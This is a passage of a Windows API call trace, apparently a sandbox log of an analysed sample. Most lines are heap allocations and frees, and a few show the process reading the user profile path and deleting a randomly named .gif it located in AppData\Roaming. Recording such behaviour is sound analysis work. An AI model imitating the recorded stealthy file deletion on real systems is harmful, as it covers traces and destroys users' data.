RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0207.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.118] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.119] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.119] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0207.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/USOrj0U79kg56B_MZLC3.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif", lpFilePart=0x8bedfc*="USOrj0U79kg56B_MZLC3.gif") returned 0x46 [0207.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0207.122] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\usorj0u79kg56b_mzlc3.gif")) returned 0x2020 [0207.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e6aa90, ftCreationTime.dwHighDateTime=0x1d4cd39, ftLastAccessTime.dwLowDateTime=0xe61ff240, ftLastAccessTime.dwHighDateTime=0x1d4d3bd, ftLastWriteTime.dwLowDateTime=0xe61ff240, ftLastWriteTime.dwHighDateTime=0x1d4d3bd, nFileSizeHigh=0x0, nFileSizeLow=0x12283, dwReserved0=0xe98, dwReserved1=0x4, cFileName="USOrj0U79kg56B_MZLC3.gif", cAlternateFileName="USORJ0~1.GIF")) returned 0xaa5760 [0207.122] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\usorj0u79kg56b_mzlc3.gif")) returned 1 [0207.124] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e6aa90, ftCreationTime.dwHighDateTime=0x1d4cd39, ftLastAccessTime.dwLowDateTime=0xe61ff240, ftLastAccessTime.dwHighDateTime=0x1d4d3bd, ftLastWriteTime.dwLowDateTime=0xe61ff240, ftLastWriteTime.dwHighDateTime=0x1d4d3bd, nFileSizeHigh=0x0, nFileSizeLow=0x12283, dwReserved0=0xe98, dwReserved1=0x4, cFileName="USOrj0U79kg56B_MZLC3.gif", cAlternateFileName="USORJ0~1.GIF")) returned 0 [0207.124] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0207.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.125] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0207.125] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0207.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.126] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0207.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/USOrj0U79kg56B_MZLC3.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif", lpFilePart=0x8bf658*="USOrj0U79kg56B_MZLC3.gif") returned 0x46 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0207.128] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\USOrj0U79kg56B_MZLC3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\usorj0u79kg56b_mzlc3.gif")) returned 0xffffffff [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 